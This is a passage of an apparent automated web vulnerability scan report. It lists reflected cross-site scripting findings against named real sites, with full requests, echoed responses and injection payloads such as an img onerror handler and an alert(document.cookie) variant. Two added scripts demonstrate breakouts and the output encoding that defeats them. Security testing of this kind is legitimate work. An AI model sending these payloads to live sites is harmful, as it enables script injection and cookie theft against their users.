Date: Fri, 06 May 2011 21:50:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 06 May 2011 21:50:28 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter e69b7<script>alert(1)</script>70b75349d17

5.66. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the application's response. The payload 6dea5<script>alert(1)</script>3bb340fdd25 was submitted in the csid parameter. This input was echoed with its letters converted to upper case, as I109856DEA5<SCRIPT>ALERT(1)</SCRIPT>3BB340FDD25, inside a /* */ block comment of a response served as application/javascript.

The reflection confirms that the csid value is not encoded, but two things limit the proof of concept as shown. A browser that honours the declared Content-Type will not render the tag as HTML, so exploitation depends on the response being interpreted as HTML. And the upper-casing turns alert(1) into ALERT(1), which does not resolve because JavaScript identifiers are case-sensitive; even where the markup were rendered, a working payload would have to survive upper-casing.

Request

GET /gateway/gw.js?csid=I109856dea5<script>alert(1)</script>3bb340fdd25&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="...[SNIP]..."; rsi_us_1000000="...[SNIP]..."; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=...[SNIP]...; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_JXtz=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 07 May 2011 22:38:28 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 08 May 2011 22:38:28 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 07 May 2011 22:38:28 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "I109856DEA5<SCRIPT>ALERT(1)</SCRIPT>3BB340FDD25" was not recognized.
*/

5.67. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into the application's response. The payload 9f349%0aalert(1)//0354955d84e was submitted in the url parameter. This input was echoed as 9f349
alert(1)//0354955d84e
in the application's response, the %0a having been decoded to a literal newline.

The scanner classified the injection point as a JavaScript rest-of-line comment, but the only // in the echoed text is the scheme separator of the URL being reported back. In the response shown, the value sits in the plain text of a 138-byte text/html error body that contains no script element, so the newline and alert(1) are displayed as text rather than executed; the response also carries X-XSS-Protection: 1; mode=block. The reflection is unencoded, but demonstrating script execution here would need a payload containing HTML markup, which this request does not show.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/newsletterSubscribe.xml9f349%0aalert(1)//0354955d84e&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&up_newsletterHeadlineText=Subscribe+to+All+At+Sea!&up_newsletterStandardText=Get+updates+of+our+latest+content&communityId=14672211859858017590&caller=http://allatsea.net/subscribe.htm HTTP/1.1
Host: k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:13:20 GMT
Expires: Fri, 06 May 2011 21:13:20 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 138

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/newsletterSubscribe.xml9f349
alert(1)//0354955d84e
. HTTP error 400
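
The context the scanner named for 5.58 and 5.67, a request value written after // in a script, is worth understanding even though the responses shown put the value in HTML text: a // comment ends at any ECMAScript line terminator, which is what the %0a in the payload is aimed at, and the same holds for CR and for the U+2028 and U+2029 characters that a newline-only filter leaves in place. The Node.js script below is an added example, not code from the report or from the gadget service: it renders a hypothetical comment template three ways (unfiltered, CR/LF stripped, all line terminators escaped) and runs the result with a stand-in alert() for the report's payload and for a U+2028 variant. The template and the function names are assumptions.

```javascript
// Added example (not from the report): a request value written into a
// JavaScript rest-of-line comment, the context the scanner assigned to
// findings 5.58 and 5.67, exercised with the report's %0a payload and with
// a U+2028 variant that newline-only filtering misses. Template and names
// are assumptions for illustration.

const BASE_URL = 'http://www.google.com/friendconnect/gadgets/recommended_pages.xml';
const PAYLOAD_LF = BASE_URL + '845e0\nalert(1)//2a6a5889652';      // the report's %0a
const PAYLOAD_LS = BASE_URL + '845e0\u2028alert(1)//2a6a5889652';  // LINE SEPARATOR

// Vulnerable: the value follows "//" and is assumed to stay inside the comment.
function renderNaive(specUrl) {
  return '// gadget spec: ' + specUrl + '\nvar gadget = {};';
}

// Common half-fix: only CR and LF are removed. ECMAScript also treats U+2028
// and U+2029 as line terminators, and a // comment ends at any of them.
function renderCrLfStripped(specUrl) {
  return '// gadget spec: ' + String(specUrl).replace(/[\r\n]/g, '') + '\nvar gadget = {};';
}

// Hardened: every line terminator is replaced by a visible \uXXXX escape
// sequence, which is ordinary text inside a comment and cannot end it.
function renderSafe(specUrl) {
  const escaped = String(specUrl).replace(/[\r\n\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
  return '// gadget spec: ' + escaped + '\nvar gadget = {};';
}

// Harness: compile and run a rendered snippet with alert() replaced by a
// stand-in and report whether the injected call was reached.
function injectedCodeRuns(code) {
  let fired = false;
  try {
    new Function('alert', code)(() => { fired = true; });
  } catch (e) {
    // parse or runtime failure: the payload did not run
  }
  return fired;
}

for (const [label, render] of [
  ['naive', renderNaive], ['CR/LF stripped', renderCrLfStripped], ['safe', renderSafe],
]) {
  console.log(label.padEnd(15), 'LF:', injectedCodeRuns(render(PAYLOAD_LF)),
    'U+2028:', injectedCodeRuns(render(PAYLOAD_LS)));
}
```

The naive template executes both payloads, the CR/LF filter stops only the %0a one, and the escaping version stops both. The better design is to keep user data out of comments altogether; where a server must report an identifier back in a script, placing it in a properly serialised string literal, or reducing it to an allow-listed character set first, leaves nothing for a line terminator to break out of.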

5.68. http://kroogy.com/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f643<img%20src%3da%20onerror%3dalert(1)>45b677da56a was submitted in the REST URL parameter 1. This input was echoed as 7f643<img src=a onerror=alert(1)>45b677da56a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /a7f643<img%20src%3da%20onerror%3dalert(1)>45b677da56a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/favicon.ico627d6%3Cimg%20src%3da%20onerror%3dalert(1)%3E13232c83b32
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.4.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:56:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>A7f643<img src=a onerror=alert(1)>45b677da56aController</strong>
...[SNIP]...
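
Two HTML contexts recur in the findings above: a value inside a double-quoted href attribute (5.59 and 5.60, where the payload's own quote closes the attribute and a style attribute follows), and a value echoed as text between tags (5.64 to 5.68, and the remaining kroogy.com findings below, where the payload simply supplies an <img> tag with an onerror handler). The Node.js script below is an added example, not code from the report, from DoubleClick or from kroogy.com: it renders both templates in the shape of the responses shown, once raw and once through an HTML encoder, and inspects the result with a deliberately small start-tag scanner to show which attributes and elements each version actually contains. The templates, names and scanner are assumptions for illustration.

```javascript
// Added example (not from the report): the two HTML contexts seen above,
// a value inside a double-quoted href attribute (5.59 and 5.60) and a value
// echoed as text between tags (5.64 to 5.68), rendered naively and with
// output encoding, then inspected with a small start-tag scanner.

// Payloads taken from the report's own requests.
const ATTR_PAYLOAD = 'e3573"style="x:expression(alert(1))"61fc2b812f1';
const TEXT_PAYLOAD = '7f643<img src=a onerror=alert(1)>45b677da56a';

// Encodes the five characters that change meaning in HTML text and in
// quoted attribute values. Attributes must be quoted for this to be enough.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Shaped like the 5.59 response: the !category value lands inside href="...".
function renderAnchorNaive(category) {
  return '<a target="_top" href="http://iv.doubleclick.net/click;!category=' + category + ';bsg=101037">';
}
function renderAnchorSafe(category) {
  return '<a target="_top" href="http://iv.doubleclick.net/click;!category=' + escapeHtml(category) + ';bsg=101037">';
}

// Shaped like the 5.68 response: the path segment is echoed inside <strong>.
function renderStrongNaive(segment) {
  return '<strong>' + segment + 'Controller</strong>';
}
function renderStrongSafe(segment) {
  return '<strong>' + escapeHtml(segment) + 'Controller</strong>';
}

// Minimal start-tag scanner: returns [{ name, attrs }] for each start tag.
// Like a browser, it accepts a new attribute name directly after a closing
// quote (href="..."style="..."), which is exactly what the payload relies on.
// It is a teaching aid, not an HTML parser.
function startTags(html) {
  const tags = [];
  let i = 0;
  while ((i = html.indexOf('<', i)) !== -1) {
    i += 1;
    const m = /^[a-zA-Z][a-zA-Z0-9]*/.exec(html.slice(i));
    if (!m) continue;                       // "</strong>" or a stray "<"
    const name = m[0].toLowerCase();
    i += name.length;
    const attrs = {};
    while (i < html.length && html[i] !== '>') {
      if (/[\s\/]/.test(html[i])) { i += 1; continue; }
      let attrName = '';
      while (i < html.length && !/[\s=>\/]/.test(html[i])) attrName += html[i++];
      while (i < html.length && /\s/.test(html[i])) i += 1;
      let value = '';
      if (html[i] === '=') {
        i += 1;
        while (i < html.length && /\s/.test(html[i])) i += 1;
        const quote = html[i];
        if (quote === '"' || quote === "'") {
          i += 1;
          while (i < html.length && html[i] !== quote) value += html[i++];
          i += 1;                             // skip the closing quote
        } else {
          while (i < html.length && !/[\s>]/.test(html[i])) value += html[i++];
        }
      }
      if (attrName) attrs[attrName.toLowerCase()] = value;
    }
    tags.push({ name, attrs });
  }
  return tags;
}

// Checks used below: did the anchor gain a style attribute, and does any
// tag in the output carry an on* event-handler attribute?
function anchorGainsStyle(html) {
  const a = startTags(html).find((t) => t.name === 'a');
  return Boolean(a && 'style' in a.attrs);
}
function hasEventHandlerTag(html) {
  return startTags(html).some((t) => Object.keys(t.attrs).some((k) => k.startsWith('on')));
}

for (const [label, html] of [
  ['href naive', renderAnchorNaive(ATTR_PAYLOAD)],
  ['href encoded', renderAnchorSafe(ATTR_PAYLOAD)],
  ['text naive', renderStrongNaive(TEXT_PAYLOAD)],
  ['text encoded', renderStrongSafe(TEXT_PAYLOAD)],
]) {
  console.log(label.padEnd(13), JSON.stringify(startTags(html)));
}
```

With the raw templates the anchor acquires a style attribute and the text context produces an img element carrying onerror; with escapeHtml applied the anchor keeps only target and href and the text context yields nothing but the strong element. The IE-only expression() in the 5.59 payload is incidental: once the quote closes href, an attacker on any browser can supply an event-handler attribute instead, which is why the check above looks for on* attributes rather than for style alone. One encoder covers both contexts only because the attribute is quoted; an unquoted attribute would also need whitespace and a few other characters encoded, and the simplest rule is never to emit one.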

5.69. http://kroogy.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 627d6<img%20src%3da%20onerror%3dalert(1)>13232c83b32 was submitted in the REST URL parameter 1. This input was echoed as 627d6<img src=a onerror=alert(1)>13232c83b32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico627d6<img%20src%3da%20onerror%3dalert(1)>13232c83b32 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304737441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129279958.1180364951.1304737441.1304737441.1304737441.1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:55:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2134

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Favicon.ico627d6<img src=a onerror=alert(1)>13232c83b32Controller</strong>
...[SNIP]...

5.70. http://kroogy.com/pub/banner_160_600.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_160_600.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3e0ed<img%20src%3da%20onerror%3dalert(1)>c7f680ee50 was submitted in the REST URL parameter 1. This input was echoed as 3e0ed<img src=a onerror=alert(1)>c7f680ee50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pub3e0ed<img%20src%3da%20onerror%3dalert(1)>c7f680ee50/banner_160_600.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:04:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2125

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Pub3e0ed<img src=a onerror=alert(1)>c7f680ee50Controller</strong>
...[SNIP]...

5.71. http://kroogy.com/pub/banner_728_90.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_728_90.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload baf1c<img%20src%3da%20onerror%3dalert(1)>950c584fd97 was submitted in the REST URL parameter 1. This input was echoed as baf1c<img src=a onerror=alert(1)>950c584fd97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pubbaf1c<img%20src%3da%20onerror%3dalert(1)>950c584fd97/banner_728_90.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://ads.adonion.com/serving/showbanner.php?zone_id=45274&user_id=17557&site_id=15418&size_id=1&type_id=2&flag=12&b1=%239cbce8&b2=%23000000&b3=%23FFFFFF&b4=%23000000&ref=http%3A%2F%2Fwww.kroogy.com%2Fsearch%2Famazon%3Fsearch%3Dmp3%26type%3DAmazon%26fl%3D0&token=ZGs2zNQg0yIgLSzR0vklWi0pMM7PIdh8fSoqz88i03z5alom3iHRIg&random=2580
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.2.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:56:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2126

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Pubbaf1c<img src=a onerror=alert(1)>950c584fd97Controller</strong>
...[SNIP]...

5.72. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_728_90_random.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15bf1<img%20src%3da%20onerror%3dalert(1)>c26cf5636dc was submitted in the REST URL parameter 1. This input was echoed as 15bf1<img src=a onerror=alert(1)>c26cf5636dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pub15bf1<img%20src%3da%20onerror%3dalert(1)>c26cf5636dc/banner_728_90_random.php HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2126

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Pub15bf1<img src=a onerror=alert(1)>c26cf5636dcController</strong>
...[SNIP]...

5.73. http://kroogy.com/pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dc/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dc/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3cd5<img%20src%3da%20onerror%3dalert(1)>368457392a4 was submitted in the REST URL parameter 1. This input was echoed as a3cd5<img src=a onerror=alert(1)>368457392a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dca3cd5<img%20src%3da%20onerror%3dalert(1)>368457392a4/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dc/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.2.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:56:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2170

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<img src=a onerror=alert(1)>c26cf5636dca3cd5<img src=a onerror=alert(1)>368457392a4Controller</strong>
...[SNIP]...

5.74. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web/Linkbucks%20vlad%20modelS

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c3d36<img%20src%3da%20onerror%3dalert(1)>1f123855a7 was submitted in the REST URL parameter 1. This input was echoed as c3d36<img src=a onerror=alert(1)>1f123855a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchc3d36<img%20src%3da%20onerror%3dalert(1)>1f123855a7/web/Linkbucks%20vlad%20modelS HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:07:47 GMT
Server: Apache/2.2.3 (CentOS)
